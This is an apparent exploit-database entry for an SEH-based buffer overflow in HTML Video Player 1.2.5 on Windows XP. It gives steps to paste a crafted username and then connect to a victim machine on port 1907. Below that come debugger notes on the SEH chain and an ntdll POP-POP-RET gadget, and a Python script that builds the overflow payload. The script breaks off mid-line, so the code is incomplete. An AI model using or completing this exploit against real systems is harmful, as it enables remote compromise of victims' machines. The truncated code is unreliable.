HTML Video Player 1.2.5 - Buffer-Overflow (SEH)

Kağan Çapar 2018-11-19 local windows_x86
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kağan Çapar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" and copy content to clipboard 
# Open software, click Help > Register and paste "Username" click "OK"
# Finally, Connect victim machine on port your localport "1907"

#!/usr/bin/python
import struct

#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 => 

#7C901931   5E               POP ESI
#7C901932   5B               POP EBX
#7C901933   C3               RETN

#Executable modules, item 14
#Base=7C900000
#Size=000B2000 (729088.)
#Entry=7C912AFC ntdll.
#Name=ntdll    (system)
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
#Path=C:\WINDOWS\system32\ntdll.dll

file = open("exploit.txt", "w")
buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
buf+= "\xEB\x06\x90\x90" #6b jmp code
buf+= struct.pack('